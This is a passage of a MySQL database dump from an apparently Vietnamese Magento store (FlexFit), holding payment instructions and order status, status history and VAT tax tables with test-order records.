kho\\u1ea3n \\u0111\\u1ebfn FlexFit\",\"instructions\":\"CH\\u1ee6 T\\u00c0I KHO\\u1ea2N: C\\u00f4ng ty c\\u1ed5 ph\\u1ea7n FLEXFIT\\r\\nS\\u1ed0 T\\u00c0I KHO\\u1ea2N: 115000170545\\r\\nT\\u00caN NG\\u00c2N H\\u00c0NG: Ng\\u00e2n h\\u00e0ng C\\u00f4ng Th\\u01b0\\u01a1ng Vi\\u1ec7t Nam - VietinBank\\r\\nCHI NH\\u00c1NH: Ho\\u00e0n Ki\\u1ebfm\"}');

--
-- Table structure for table `sales_order_status`
--

CREATE TABLE `sales_order_status` (
  `status` varchar(32) NOT NULL COMMENT 'Status',
  `label` varchar(128) NOT NULL COMMENT 'Label',
  PRIMARY KEY (`status`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Order Status Table';

--
-- Dumping data for table `sales_order_status`
--

INSERT INTO `sales_order_status` VALUES ('canceled','Canceled'),('closed','Closed'),('complete','Complete'),('fraud','Suspected Fraud'),('holded','On Hold'),('installation','Installation'),('payment_onepay_failed','OnePay Failed'),('payment_onepay_pending','OnePay Pending'),('payment_review','Payment Review'),('paypal_canceled_reversal','PayPal Canceled Reversal'),('paypal_reversed','PayPal Reversed'),('pending','Pending'),('pending_payment','Pending Payment'),('pending_paypal','Pending PayPal'),('processing','Processing'),('shipment','Shipment');

--
-- Table structure for table `sales_order_status_history`
--

CREATE TABLE `sales_order_status_history` (
  `entity_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Entity ID',
  `parent_id` int(10) unsigned NOT NULL COMMENT 'Parent ID',
  `is_customer_notified` int(11) DEFAULT NULL COMMENT 'Is Customer Notified',
  `is_visible_on_front` smallint(5) unsigned NOT NULL DEFAULT 0 COMMENT 'Is Visible On Front',
  `comment` text DEFAULT NULL COMMENT 'Comment',
  `status` varchar(32) DEFAULT NULL COMMENT 'Status',
  `created_at` timestamp NOT NULL DEFAULT current_timestamp() COMMENT 'Created At',
  `entity_name` varchar(32) DEFAULT NULL COMMENT 'Shows what entity history is bind to.',
  PRIMARY KEY (`entity_id`),
  KEY `SALES_ORDER_STATUS_HISTORY_PARENT_ID` (`parent_id`),
  KEY `SALES_ORDER_STATUS_HISTORY_CREATED_AT` (`created_at`),
  CONSTRAINT `SALES_ORDER_STATUS_HISTORY_PARENT_ID_SALES_ORDER_ENTITY_ID` FOREIGN KEY (`parent_id`) REFERENCES `sales_order` (`entity_id`) ON DELETE CASCADE
) ENGINE=InnoDB AUTO_INCREMENT=161 DEFAULT CHARSET=utf8 COMMENT='Sales Flat Order Status History';

--
-- Dumping data for table `sales_order_status_history`
--

INSERT INTO `sales_order_status_history` VALUES (1,21,1,0,NULL,'pending_payment','2021-10-06 04:36:48','order'),(2,22,1,0,NULL,'pending_payment','2021-10-06 04:37:57','order'),(3,23,1,0,NULL,'pending_payment','2021-10-06 04:41:01','order'),(4,27,1,0,'Notified customer about invoice creation #1.','pending','2021-10-06 11:00:21','invoice'),(5,30,1,0,'Notified customer about invoice creation #2.','pending','2021-10-06 11:09:55','invoice'),(6,31,1,0,'Notified customer about invoice creation #3.','pending','2021-10-06 11:11:52','invoice'),(7,32,1,0,'Notified customer about invoice creation #5.','processing','2021-10-06 11:23:08','invoice'),(8,34,1,0,'Notified customer about invoice creation #6.','processing','2021-10-06 11:34:11','invoice'),(9,35,1,0,'Notified customer about invoice creation #7.','processing','2021-10-06 11:38:45','invoice'),(10,36,1,0,'Notified customer about invoice creation #8.','pending','2021-10-06 11:43:05','invoice'),(11,38,1,0,'Notified customer about invoice creation #9.','pending','2021-10-06 11:50:45','invoice'),(12,41,1,0,'Notified customer about invoice creation #10.','pending','2021-10-06 11:58:45','invoice'),(13,42,1,0,'Notified customer about invoice creation #11.','pending','2021-10-06 12:02:28','invoice'),(14,43,1,0,'Notified customer about invoice creation #12.','pending','2021-10-06 15:37:47','invoice'),(15,45,1,0,'Notified customer about invoice creation #13.','pending','2021-10-07 02:57:22','invoice'),(16,46,1,0,'Notified customer about invoice creation #14.','processing','2021-10-07 07:00:51','invoice'),(17,47,NULL,0,'Giao dịch thất bại','pending','2021-10-07 07:07:51','order'),(18,48,1,0,'Notified customer about invoice creation #15.','processing','2021-10-07 07:08:28','invoice'),(19,50,NULL,0,'Giao dịch thất bại','pending','2021-10-07 07:15:49','order'),(20,52,NULL,0,'Giao dịch thất bại','pending','2021-10-07 07:20:23','order'),(21,54,NULL,0,'Giao dịch thất bại','pending','2021-10-07 07:26:40','order'),(22,58,NULL,0,'Giao dịch thất bại','pending','2021-10-07 08:12:12','order'),(23,78,NULL,0,'Giao dịch thất bại','pending','2021-10-07 09:16:52','order'),(24,79,NULL,0,'Giao dịch thất bại','pending','2021-10-07 09:17:59','order'),(25,81,NULL,0,'Giao dịch thất bại','pending','2021-10-07 09:28:04','order'),(26,85,NULL,0,'Giao dịch thất bại','pending','2021-10-07 09:33:41','order'),(27,86,NULL,0,'Giao dịch thất bại','pending','2021-10-07 09:36:22','order'),(28,87,1,0,'Notified customer about invoice creation #16.','processing','2021-10-07 09:53:08','invoice'),(29,88,1,0,'Notified customer about invoice creation #17.','processing','2021-10-07 10:05:26','invoice'),(30,90,1,0,'Notified customer about invoice creation #18.','processing','2021-10-11 06:49:13','invoice'),(31,91,1,0,'Notified customer about invoice creation #19.','processing','2021-10-11 06:58:30','invoice'),(32,92,NULL,0,'Giao dịch thất bại','pending','2021-10-11 07:08:59','order'),(33,93,NULL,0,'Giao dịch thất bại','pending','2021-10-18 07:35:52','order'),(34,94,1,0,'Notified customer about invoice creation #20.','pending','2021-10-18 07:41:24','invoice'),(35,99,1,0,NULL,'pending_payment','2021-11-15 09:14:29','order'),(36,99,0,1,'Netbase JSC JSC: test momo','pending_payment','2021-11-15 09:14:29','order'),(37,100,1,0,NULL,'pending_payment','2021-11-15 09:16:49','order'),(38,101,1,0,NULL,'pending_payment','2021-11-15 09:40:56','order'),(39,102,1,0,NULL,'pending_payment','2021-11-15 09:42:53','order'),(40,102,0,1,'Netbase JSC: Test momo','pending_payment','2021-11-15 09:42:53','order'),(41,103,1,0,NULL,'pending_payment','2021-11-15 09:44:45','order'),(42,103,0,1,'Netbase JSC: Test momo','pending_payment','2021-11-15 09:44:45','order'),(43,105,1,0,NULL,'pending_payment','2021-11-15 09:51:07','order'),(44,106,1,0,NULL,'pending_payment','2021-11-15 09:53:13','order'),(45,107,1,0,NULL,'pending_payment','2021-11-15 09:54:34','order'),(46,108,1,0,NULL,'pending_payment','2021-11-16 02:25:50','order'),(47,109,1,0,NULL,'pending_payment','2021-11-16 03:12:35','order'),(48,109,0,1,'Netbase JSC JSC: Test momo','pending_payment','2021-11-16 03:12:36','order'),(49,110,1,0,NULL,'pending_payment','2021-11-16 03:21:32','order'),(50,111,1,0,NULL,'pending_payment','2021-11-16 03:52:16','order'),(51,112,1,0,NULL,'pending_payment','2021-11-16 04:28:15','order'),(52,112,0,1,'Netbase JSC: Test momo','pending_payment','2021-11-16 04:28:15','order'),(53,113,1,0,NULL,'pending_payment','2021-11-16 04:30:31','order'),(54,113,0,1,'Netbase JSC: test momo','pending_payment','2021-11-16 04:30:31','order'),(55,114,1,0,NULL,'pending_payment','2021-11-16 04:33:48','order'),(56,115,1,0,NULL,'pending_payment','2021-11-16 04:35:38','order'),(57,115,0,1,'Netbase JSC: T','pending_payment','2021-11-16 04:35:38','order'),(58,116,1,0,NULL,'pending_payment','2021-11-16 04:37:50','order'),(59,117,1,0,NULL,'pending_payment','2021-11-16 04:39:11','order'),(60,118,1,0,NULL,'pending_payment','2021-11-16 04:40:46','order'),(61,119,1,0,NULL,'pending_payment','2021-11-16 04:42:37','order'),(62,120,1,0,NULL,'pending_payment','2021-11-16 04:45:00','order'),(63,121,1,0,NULL,'pending_payment','2021-11-16 04:46:11','order'),(64,122,1,0,NULL,'pending_payment','2021-11-16 04:48:26','order'),(65,123,1,0,NULL,'pending_payment','2021-11-16 04:49:29','order'),(66,124,1,0,NULL,'pending_payment','2021-11-16 04:50:19','order'),(67,125,1,0,NULL,'pending_payment','2021-11-16 04:50:21','order'),(68,126,1,0,NULL,'pending_payment','2021-11-16 04:53:11','order'),(69,127,1,0,NULL,'pending_payment','2021-11-16 05:00:58','order'),(70,128,1,0,NULL,'pending_payment','2021-11-16 05:06:42','order'),(71,129,1,0,NULL,'pending_payment','2021-11-16 05:09:32','order'),(72,130,1,0,NULL,'pending_payment','2021-11-16 05:16:32','order'),(73,131,1,0,NULL,'pending_payment','2021-11-16 05:17:43','order'),(74,132,1,0,NULL,'pending_payment','2021-11-16 05:18:47','order'),(75,133,1,0,NULL,'pending_payment','2021-11-16 05:21:15','order'),(76,134,1,0,NULL,'pending_payment','2021-11-16 05:26:44','order'),(77,135,1,0,NULL,'pending_payment','2021-11-16 05:29:10','order'),(78,136,1,0,NULL,'pending_payment','2021-11-16 05:32:59','order'),(79,137,1,0,NULL,'pending_payment','2021-11-16 05:34:06','order'),(80,138,1,0,NULL,'pending_payment','2021-11-16 05:36:42','order'),(81,139,1,0,NULL,'pending_payment','2021-11-16 05:39:10','order'),(82,140,1,0,NULL,'pending_payment','2021-11-16 05:42:11','order'),(83,141,1,0,NULL,'pending_payment','2021-11-16 05:45:41','order'),(84,142,1,0,NULL,'pending_payment','2021-11-16 05:48:12','order'),(85,143,1,0,NULL,'pending_payment','2021-11-16 05:49:54','order'),(86,144,1,0,NULL,'pending_payment','2021-11-16 05:51:28','order'),(87,145,1,0,NULL,'pending_payment','2021-11-16 05:54:29','order'),(88,146,1,0,NULL,'pending_payment','2021-11-16 05:55:40','order'),(89,147,1,0,NULL,'pending_payment','2021-11-16 05:57:17','order'),(90,148,1,0,NULL,'pending_payment','2021-11-16 05:58:49','order'),(91,149,1,0,NULL,'pending_payment','2021-11-16 06:05:27','order'),(92,150,1,0,NULL,'pending_payment','2021-11-16 06:09:17','order'),(93,151,1,0,NULL,'pending_payment','2021-11-16 06:12:17','order'),(94,152,1,0,NULL,'pending_payment','2021-11-16 06:13:55','order'),(95,153,1,0,NULL,'pending_payment','2021-11-16 06:15:02','order'),(96,154,1,0,NULL,'pending_payment','2021-11-16 06:16:37','order'),(97,155,1,0,NULL,'pending_payment','2021-11-16 06:20:53','order'),(98,156,1,0,NULL,'pending_payment','2021-11-16 06:21:54','order'),(99,157,1,0,NULL,'pending_payment','2021-11-16 06:22:32','order'),(100,158,1,0,NULL,'pending_payment','2021-11-16 06:23:49','order'),(101,159,1,0,NULL,'pending_payment','2021-11-16 06:24:52','order'),(102,160,1,0,NULL,'pending_payment','2021-11-16 06:26:01','order'),(103,161,1,0,NULL,'pending_payment','2021-11-16 06:27:02','order'),(104,162,1,0,NULL,'pending_payment','2021-11-16 06:30:43','order'),(105,163,1,0,NULL,'pending_payment','2021-11-16 06:31:31','order'),(106,164,1,0,NULL,'pending_payment','2021-11-16 06:32:11','order'),(107,165,1,0,NULL,'pending_payment','2021-11-16 06:41:06','order'),(108,166,1,0,NULL,'pending_payment','2021-11-16 06:41:47','order'),(109,167,1,0,NULL,'pending_payment','2021-11-16 06:49:36','order'),(110,168,1,0,NULL,'pending_payment','2021-11-16 06:51:19','order'),(111,169,1,0,NULL,'pending_payment','2021-11-16 06:55:01','order'),(112,170,1,0,NULL,'pending_payment','2021-11-16 06:58:10','order'),(113,171,1,0,NULL,'pending_payment','2021-11-16 07:00:29','order'),(114,172,1,0,NULL,'pending_payment','2021-11-16 07:03:18','order'),(115,173,1,0,NULL,'pending_payment','2021-11-16 07:09:13','order'),(116,174,1,0,NULL,'pending_payment','2021-11-16 10:06:21','order'),(117,175,1,0,NULL,'pending_payment','2021-11-16 10:18:59','order'),(118,176,1,0,NULL,'pending_payment','2021-11-17 08:06:33','order'),(119,178,1,0,NULL,'pending_payment','2021-11-17 14:54:18','order'),(120,179,NULL,0,'Giao dịch thất bại','pending','2021-11-17 14:55:47','order'),(121,180,1,0,NULL,'pending_payment','2021-11-17 14:57:11','order'),(122,181,1,0,'Notified customer about invoice creation #21.','pending','2021-11-22 16:27:42','invoice'),(123,185,1,0,NULL,'pending_payment','2021-12-06 03:12:11','order'),(124,186,1,0,NULL,'pending_payment','2021-12-06 03:14:14','order'),(125,187,1,0,NULL,'pending_payment','2021-12-06 03:18:54','order'),(126,188,1,0,NULL,'pending_payment','2021-12-06 03:22:26','order'),(127,189,1,0,NULL,'pending_payment','2021-12-06 03:31:17','order'),(128,190,1,0,NULL,'pending_payment','2021-12-06 03:42:06','order'),(129,191,1,0,NULL,'pending_payment','2021-12-06 03:48:14','order'),(130,192,1,0,NULL,'pending_payment','2021-12-06 03:50:09','order'),(131,193,1,0,NULL,'pending_payment','2021-12-06 03:54:35','order'),(132,194,1,0,NULL,'pending_payment','2021-12-06 04:03:17','order'),(133,195,1,0,NULL,'pending_payment','2021-12-06 04:12:56','order'),(134,196,1,0,NULL,'pending_payment','2021-12-06 04:17:08','order'),(135,197,1,0,NULL,'pending_payment','2021-12-06 04:19:23','order'),(136,198,1,0,NULL,'pending_payment','2021-12-06 04:25:50','order'),(137,199,1,0,NULL,'pending_payment','2021-12-06 08:13:33','order'),(138,200,1,0,NULL,'pending_payment','2021-12-06 09:01:37','order'),(139,201,1,0,NULL,'pending_payment','2021-12-06 09:05:40','order'),(140,202,1,0,NULL,'pending_payment','2021-12-06 09:06:58','order'),(141,203,1,0,NULL,'pending_payment','2021-12-06 09:11:53','order'),(142,204,1,0,NULL,'pending_payment','2021-12-06 10:23:19','order'),(143,211,1,0,NULL,'pending_payment','2021-12-07 09:25:41','order'),(144,215,1,0,NULL,'pending_payment','2021-12-08 08:31:09','order'),(145,216,1,0,NULL,'pending_payment','2021-12-08 08:47:01','order'),(146,217,1,0,NULL,'pending_payment','2021-12-08 08:58:56','order'),(147,218,1,0,NULL,'pending_payment','2021-12-08 09:15:21','order'),(148,219,1,0,NULL,'pending_payment','2021-12-08 09:27:22','order'),(149,220,1,0,NULL,'pending_payment','2021-12-08 09:31:19','order'),(150,221,1,0,NULL,'pending_payment','2021-12-08 09:36:57','order'),(151,221,NULL,0,'Captured amount of 2.000,00 ₫ online. ID giao dịch: \"18960618629\"','processing','2021-12-08 09:37:15','invoice'),(152,222,1,0,NULL,'pending_payment','2021-12-08 09:45:09','order'),(153,222,NULL,0,'Captured amount of 2.000,00 ₫ online. ID giao dịch: \"18960128242\"','processing','2021-12-08 09:45:27','invoice'),(154,223,1,0,NULL,'pending_payment','2021-12-08 09:57:09','order'),(155,223,NULL,0,'Captured amount of 4.000,00 ₫ online. ID giao dịch: \"18960703159\"','processing','2021-12-08 09:57:29','invoice'),(156,224,1,0,NULL,'pending_payment','2021-12-08 10:43:20','order'),(157,227,NULL,0,'Giao dịch thất bại','pending','2022-01-05 04:48:09','order'),(158,229,0,1,'Order Placed by Store Administrator','pending','2022-01-07 10:08:56','order'),(159,229,0,0,'Order Placed by Netbase Admin using Admin Panel','pending','2022-01-07 10:08:56','order'),(160,229,0,0,'Đã nhận cọc 50%','pending','2022-01-07 10:13:59','order');

--
-- Table structure for table `sales_order_status_label`
--

CREATE TABLE `sales_order_status_label` (
  `status` varchar(32) NOT NULL COMMENT 'Status',
  `store_id` smallint(5) unsigned NOT NULL COMMENT 'Store ID',
  `label` varchar(128) NOT NULL COMMENT 'Label',
  PRIMARY KEY (`status`,`store_id`),
  KEY `SALES_ORDER_STATUS_LABEL_STORE_ID` (`store_id`),
  CONSTRAINT `SALES_ORDER_STATUS_LABEL_STATUS_SALES_ORDER_STATUS_STATUS` FOREIGN KEY (`status`) REFERENCES `sales_order_status` (`status`) ON DELETE CASCADE,
  CONSTRAINT `SALES_ORDER_STATUS_LABEL_STORE_ID_STORE_STORE_ID` FOREIGN KEY (`store_id`) REFERENCES `store` (`store_id`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Order Status Label Table';

--
-- Dumping data for table `sales_order_status_label`
--


--
-- Table structure for table `sales_order_status_state`
--

CREATE TABLE `sales_order_status_state` (
  `status` varchar(32) NOT NULL COMMENT 'Status',
  `state` varchar(32) NOT NULL COMMENT 'Label',
  `is_default` smallint(5) unsigned NOT NULL DEFAULT 0 COMMENT 'Is Default',
  `visible_on_front` smallint(5) unsigned NOT NULL DEFAULT 0 COMMENT 'Visible on front',
  PRIMARY KEY (`status`,`state`),
  CONSTRAINT `SALES_ORDER_STATUS_STATE_STATUS_SALES_ORDER_STATUS_STATUS` FOREIGN KEY (`status`) REFERENCES `sales_order_status` (`status`) ON DELETE CASCADE
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Sales Order Status Table';

--
-- Dumping data for table `sales_order_status_state`
--

INSERT INTO `sales_order_status_state` VALUES ('canceled','canceled',1,1),('closed','closed',1,1),('complete','complete',1,1),('fraud','payment_review',0,1),('fraud','processing',0,1),('holded','holded',1,1),('installation','installation',1,1),('payment_review','payment_review',1,1),('pending','new',1,1),('pending_payment','pending_payment',1,0),('processing','processing',1,1),('shipment','shipment',1,1);

--
-- Table structure for table `sales_order_tax`
--

CREATE TABLE `sales_order_tax` (
  `tax_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Tax ID',
  `order_id` int(10) unsigned NOT NULL COMMENT 'Order ID',
  `code` varchar(255) DEFAULT NULL COMMENT 'Code',
  `title` varchar(255) DEFAULT NULL COMMENT 'Title',
  `percent` decimal(12,4) DEFAULT NULL COMMENT 'Percent',
  `amount` decimal(20,4) DEFAULT NULL COMMENT 'Amount',
  `priority` int(11) NOT NULL COMMENT 'Priority',
  `position` int(11) NOT NULL COMMENT 'Position',
  `base_amount` decimal(20,4) DEFAULT NULL COMMENT 'Base Amount',
  `process` smallint(6) NOT NULL COMMENT 'Process',
  `base_real_amount` decimal(20,4) DEFAULT NULL COMMENT 'Base Real Amount',
  PRIMARY KEY (`tax_id`),
  KEY `SALES_ORDER_TAX_ORDER_ID_PRIORITY_POSITION` (`order_id`,`priority`,`position`)
) ENGINE=InnoDB AUTO_INCREMENT=83 DEFAULT CHARSET=utf8 COMMENT='Sales Order Tax Table';

--
-- Dumping data for table `sales_order_tax`
--

INSERT INTO `sales_order_tax` VALUES (1,93,'VAT','VAT',1.1000,14080.0000,0,0,14080.0000,0,14080.0000),(2,94,'VAT','VAT',1.1000,1100.0000,0,0,1100.0000,0,1100.0000),(3,97,'VAT','VAT',1.1000,26125.0000,0,0,26125.0000,0,26125.0000),(4,98,'VAT','VAT',1.1000,12100.0000,0,0,12100.0000,0,12100.0000),(5,99,'VAT','VAT',1.1000,36300.0000,0,0,36300.0000,0,36300.0000),(6,100,'VAT','VAT',1.1000,111100.0000,0,0,111100.0000,0,111100.0000),(7,101,'VAT','VAT',1.1000,139700.0000,0,0,139700.0000,0,139700.0000),(8,102,'VAT','VAT',1.1000,99000.0000,0,0,99000.0000,0,99000.0000),(9,103,'VAT','VAT',1.1000,36300.0000,0,0,36300.0000,0,36300.0000),(10,104,'VAT','VAT',1.1000,111100.0000,0,0,111100.0000,0,111100.0000),(11,105,'VAT','VAT',1.1000,102300.0000,0,0,102300.0000,0,102300.0000),(12,106,'VAT','VAT',1.1000,99000.0000,0,0,99000.0000,0,99000.0000),(13,107,'VAT','VAT',1.1000,86625.0000,0,0,86625.0000,0,86625.0000),(14,108,'VAT','VAT',1.1000,139700.0000,0,0,139700.0000,0,139700.0000),(15,109,'VAT','VAT',1.1000,36300.0000,0,0,36300.0000,0,36300.0000),(16,110,'VAT','VAT',1.1000,99000.0000,0,0,99000.0000,0,99000.0000),(17,111,'VAT','VAT',1.1000,86625.0000,0,0,86625.0000,0,86625.0000),(18,112,'VAT','VAT',1.1000,36300.0000,0,0,36300.0000,0,36300.0000),(19,113,'VAT','VAT',1.1000,139700.0000,0,0,139700.0000,0,139700.0000),(20,114,'VAT','VAT',1.1000,111100.0000,0,0,111100.0000,0,111100.0000),(21,115,'VAT','VAT',1.1000,99000.0000,0,0,99000.0000,0,99000.0000),(22,116,'VAT','VAT',1.1000,86625.0000,0,0,86625.0000,0,86625.0000),(23,117,'VAT','VAT',1.1000,102300.0000,0,0,102300.0000,0,102300.0000),(24,118,'VAT','VAT',1.1000,49500.0000,0,0,49500.0000,0,49500.0000),(25,119,'VAT','VAT',1.1000,258500.0000,0,0,258500.0000,0,258500.0000),(26,120,'VAT','VAT',1.1000,258500.0000,0,0,258500.0000,0,258500.0000),(27,121,'VAT','VAT',1.1000,379500.0000,0,0,379500.0000,0,379500.0000),(28,122,'VAT','VAT',1.1000,143000.0000,0,0,143000.0000,0,143000.0000),(29,123,'VAT','VAT',1.1000,1069200.0000,0,0,1069200.0000,0,1069200.0000),(30,124,'VAT','VAT',1.1000,86625.0000,0,0,86625.0000,0,86625.0000),(31,125,'VAT','VAT',1.1000,111100.0000,0,0,111100.0000,0,111100.0000),(32,126,'VAT','VAT',1.1000,36300.0000,0,0,36300.0000,0,36300.0000),(33,127,'VAT','VAT',1.1000,99000.0000,0,0,99000.0000,0,99000.0000),(34,128,'VAT','VAT',1.1000,192500.0000,0,0,192500.0000,0,192500.0000),(35,129,'VAT','VAT',1.1000,99000.0000,0,0,99000.0000,0,99000.0000),(36,130,'VAT','VAT',1.1000,93500.0000,0,0,93500.0000,0,93500.0000),(37,131,'VAT','VAT',1.1000,1925000.0000,0,0,1925000.0000,0,1925000.0000),(38,132,'VAT','VAT',1.1000,99000.0000,0,0,99000.0000,0,99000.0000),(39,133,'VAT','VAT',1.1000,192500.0000,0,0,192500.0000,0,192500.0000),(40,134,'VAT','VAT',1.1000,93500.0000,0,0,93500.0000,0,93500.0000),(41,135,'VAT','VAT',1.1000,1925000.0000,0,0,1925000.0000,0,1925000.0000),(42,136,'VAT','VAT',1.1000,99000.0000,0,0,99000.0000,0,99000.0000),(43,137,'VAT','VAT',1.1000,192500.0000,0,0,192500.0000,0,192500.0000),(44,138,'VAT','VAT',1.1000,93500.0000,0,0,93500.0000,0,93500.0000),(45,139,'VAT','VAT',1.1000,1925000.0000,0,0,1925000.0000,0,1925000.0000),(46,140,'VAT','VAT',1.1000,99000.0000,0,0,99000.0000,0,99000.0000),(47,141,'VAT','VAT',1.1000,192500.0000,0,0,192500.0000,0,192500.0000),(48,142,'VAT','VAT',1.1000,93500.0000,0,0,93500.0000,0,93500.0000),(49,143,'VAT','VAT',1.1000,1925000.0000,0,0,1925000.0000,0,1925000.0000),(50,144,'VAT','VAT',1.1000,99000.0000,0,0,99000.0000,0,99000.0000),(51,145,'VAT','VAT',1.1000,192500.0000,0,0,192500.0000,0,192500.0000),(52,146,'VAT','VAT',1.1000,93500.0000,0,0,93500.0000,0,93500.0000),(53,147,'VAT','VAT',1.1000,1925000.0000,0,0,1925000.0000,0,1925000.0000),(54,148,'VAT','VAT',1.1000,99000.0000,0,0,99000.0000,0,99000.0000),(55,149,'VAT','VAT',1.1000,192500.0000,0,0,192500.0000,0,192500.0000),(56,150,'VAT','VAT',1.1000,93500.0000,0,0,93500.0000,0,93500.0000),(57,151,'VAT','VAT',1.1000,1925000.0000,0,0,1925000.0000,0,1925000.0000),(58,152,'VAT','VAT',1.1000,99000.0000,0,0,99000.0000,0,99000.0000),(59,153,'VAT','VAT',1.1000,192500.0000,0,0,192500.0000,0,192500.0000),(60,154,'VAT','VAT',1.1000,93500.0000,0,0,93500.0000,0,93500.0000),(61,155,'VAT','VAT',1.1000,1925000.0000,0,0,1925000.0000,0,1925000.0000),(62,156,'VAT','VAT',1.1000,99000.0000,0,0,99000.0000,0,99000.0000),(63,157,'VAT','VAT',1.1000,2117500.0000,0,0,2117500.0000,0,2117500.0000),(64,158,'VAT','VAT',1.1000,2117500.0000,0,0,2117500.0000,0,2117500.0000),(65,159,'VAT','VAT',1.1000,2117500.0000,0,0,2117500.0000,0,2117500.0000),(66,160,'VAT','VAT',1.1000,1925000.0000,0,0,1925000.0000,0,1925000.0000),(67,161,'VAT','VAT',1.1000,93500.0000,0,0,93500.0000,0,93500.0000),(68,162,'VAT','VAT',1.1000,451000.0000,0,0,451000.0000,0,451000.0000),(69,163,'VAT','VAT',1.1000,258500.0000,0,0,258500.0000,0,258500.0000),(70,164,'VAT','VAT',1.1000,192500.0000,0,0,192500.0000,0,192500.0000),(71,165,'VAT','VAT',1.1000,398200.0000,0,0,398200.0000,0,398200.0000),(72,166,'VAT','VAT',1.1000,99000.0000,0,0,99000.0000,0,99000.0000),(73,169,'VAT','VAT',1.1000,17710.0000,0,0,17710.0000,0,17710.0000),(74,170,'VAT','VAT',1.1000,2200.0000,0,0,2200.0000,0,2200.0000),(75,171,'VAT','VAT',1.1000,1100.0000,0,0,1100.0000,0,1100.0000),(76,172,'VAT','VAT',1.1000,1100.0000,0,0,1100.0000,0,1100.0000),(77,173,'VAT','VAT',1.1000,192500.0000,0,0,192500.0000,0,192500.0000),(78,177,'VAT','VAT',1.1000,80410.0000,0,0,80410.0000,0,80410.0000),(79,178,'VAT','VAT',1.1000,14190.0000,0,0,14190.0000,0,14190.0000),(80,179,'VAT','VAT',1.1000,34210.0000,0,0,34210.0000,0,34210.0000),(81,180,'VAT','VAT',1.1000,100320.0000,0,0,100320.0000,0,100320.0000),(82,181,'VAT','VAT',1.1000,2200.0000,0,0,2200.0000,0,2200.0000);

--
-- Table structure for table `sales_order_tax_item`
--

CREATE TABLE `sales_order_tax_item` (
  `tax_item_id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Tax Item ID',
  `tax_id` int(10) unsigned NOT NULL COMMENT 'Tax ID',
  `item_id` int(10) unsigned DEFAULT NULL COMMENT 'Item ID',
  `tax_percent` decimal(12,4) NOT NULL COMMENT 'Real Tax Percent For Item',
  `amount` decimal(20,4) NOT NULL COMMENT 'Tax amount for the item and tax rate',
  `base_amount` decimal(20,4) NOT NULL COMMENT 'Base tax amount for the item and tax rate',
  `real_amount` decimal(20,4) NOT NULL COMMENT 'Real tax amount for the item and tax rate',
  `real_base_amount` decimal(20,4) NOT NULL COMMENT 'Real base tax amount for the item and tax rate',
  `associated_item_id` int(10) unsigned DEFAULT NULL COMMENT 'Id of the associated item',
  `taxable_item_type` varchar(32) NOT NULL COMMENT 'Type of the taxable item',
  PRIMARY KEY (`tax_item_id`),
  UNIQUE KEY `SALES_ORDER_TAX_ITEM_TAX_ID_ITEM_ID` (`tax_id`,`item_id`),
  KEY `SALES_ORDER_TAX_ITEM_ASSOCIATED_ITEM_ID_SALES_ORDER_ITEM_ITEM_ID` (`associated_item_id`),
  KEY `SALES_ORDER_TAX_ITEM_ITEM_ID` (`item_id`),
  CONSTRAINT `SALES_ORDER_TAX_ITEM_ASSOCIATED_ITEM_ID_SALES_ORDER_ITEM_ITEM_ID` FOREIGN KEY (`associated_item_id`) REFERENCES `sales_order_item` (`item_id`) ON DELETE CASCADE,
  CONSTRAINT `SALES_ORDER_TAX_ITEM_ITEM_ID_SALES_ORDER_ITEM_ITEM_ID` FOREIGN KEY (`item_id`) REFERENCES `sales_order_item` (`item_id`) ON DELETE CASCADE,
  CONSTRAINT `SALES_ORDER_TAX_ITEM_TAX_ID_SALES_ORDER_TAX_TAX_ID` FOREIGN KEY (`tax_id`) REFERENCES `sales_order_tax` (`tax_id`) ON DELETE CASCADE
) ENGINE=InnoDB AUTO_INCREMENT=91 DEFAULT CHARSET=utf8 COMMENT='Sales Order Tax Item';

--
-- Dumping data for table `sales_order_tax_item`
--

INSERT INTO `sales_order_tax_item` VALUES (1,1,101,1.1000,14080.0000,14080.0000,14080.0000,14080.0000,NULL,'product'),(2,2,102,1.1000,1100.0000,1100.0000,1100.0000,1100.0000,NULL,'product'),(3,3,107,1.1000,26125.0000,26125.0000,26125.0000,26125.0000,NULL,'product'),(4,4,109,1.1000,12100.0000,12100.0000,12100.0000,12100.0000,NULL,'product'),(5,5,111,1.1000,36300.0000,36300.0000,36300.0000,36300.0000,NULL,'product'),(6,6,113,1.1000,111100.0000,111100.0000,111100.0000,111100.0000,NULL,'product'),(7,7,115,1.1000,139700.0000,139700.0000,139700.0000,139700.0000,NULL,'product'),(8,8,116,1.1000,99000.0000,99000.0000,99000.0000,99000.0000,NULL,'product'),(9,9,117,1.1000,36300.0000,36300.0000,36300.0000,36300.0000,NULL,'product'),(10,10,119,1.1000,111100.0000,111100.0000,111100.0000,111100.0000,NULL,'product'),(11,11,121,1.1000,102300.0000,102300.0000,102300.0000,102300.0000,NULL,'product'),(12,12,122,1.1000,99000.0000,99000.0000,99000.0000,99000.0000,NULL,'product'),(13,13,123,1.1000,86625.0000,86625.0000,86625.0000,86625.0000,NULL,'product'),(14,14,124,1.1000,139700.0000,139700.0000,139700.0000,139700.0000,NULL,'product'),(15,15,125,1.1000,36300.0000,36300.0000,36300.0000,36300.0000,NULL,'product'),(16,16,127,1.1000,99000.0000,99000.0000,99000.0000,99000.0000,NULL,'product'),(17,17,128,1.1000,86625.0000,86625.0000,86625.0000,86625.0000,NULL,'product'),(18,18,129,1.1000,36300.0000,36300.0000,36300.0000,36300.0000,NULL,'product'),(19,19,131,1.1000,139700.0000,139700.0000,139700.0000,139700.0000,NULL,'product'),(20,20,132,1.1000,111100.0000,111100.0000,111100.0000,111100.0000,NULL,'product'),(21,21,134,1.1000,99000.0000,99000.0000,99000.0000,99000.0000,NULL,'product'),(22,22,135,1.1000,86625.0000,86625.0000,86625.0000,86625.0000,NULL,'product'),(23,23,136,1.1000,102300.0000,102300.0000,102300.0000,102300.0000,NULL,'product'),(24,24,137,1.1000,49500.0000,49500.0000,49500.0000,49500.0000,NULL,'product'),(25,25,138,1.1000,258500.0000,258500.0000,258500.0000,258500.0000,NULL,'product'),(26,26,139,1.1000,258500.0000,258500.0000,258500.0000,258500.0000,NULL,'p